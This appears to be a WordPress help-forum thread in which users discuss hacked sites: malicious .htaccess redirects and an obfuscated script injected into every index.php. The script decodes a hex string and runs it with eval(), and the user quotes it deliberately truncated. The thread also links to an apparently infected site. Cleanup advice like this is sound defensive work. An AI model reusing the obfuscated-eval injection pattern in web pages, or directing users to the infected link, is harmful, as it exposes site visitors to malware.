.htaccess is a plain text file. It cannot be “infected” per se, only manipulated by adding rules with malicious intention. Your site has been hacked by an attacker.
You should be able to open it and remove the lines that are redirecting users. If you can’t find them, simple delete the file via FTP and then replace it with a new one.
Make sure you change your hosting account passwords, update WordPress and all your plugins to the latest version and make sure .htaccess is not world writeable – CHMOD 644.
Read over some WordPress security guides and hopefully you won’t get hacked again.
I got the same issue. I posted 4 hours ago and put the strange code line thats in my index.php in the last line here. Now i can´t read the answers, because my AVast antivirus blocks even the forum treat.
But when I delete the strange code (here is an example, i don´t put all numbers because maybe it executes itsself here)
“<script>var t=””;var arr=”646f6375…….(.more numbers)9″;for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>”
I deleted the files and got an 500 Error. The code is in every index.php. What can I do to fix it?
I contacted my hoster, he says the site is fine and CLEAN. This means to me, that now he has the virus on his working station. They don´t belive that my site is infected, because maybe they run a antivirus that don´t detect it.
Please take a look but ONLY WITH ACTIVATED AVAST ANTIVIRUS, if not you get infected. http://www.villarrica-online.com
Thank you, Mr. Messinger!
I allmost readed this links for 5 times, but for a beginner it sounds very difficult to do. Well, I will read it again.
Has anybody a link to a video to see how this exactly must be done? That would be a great help!
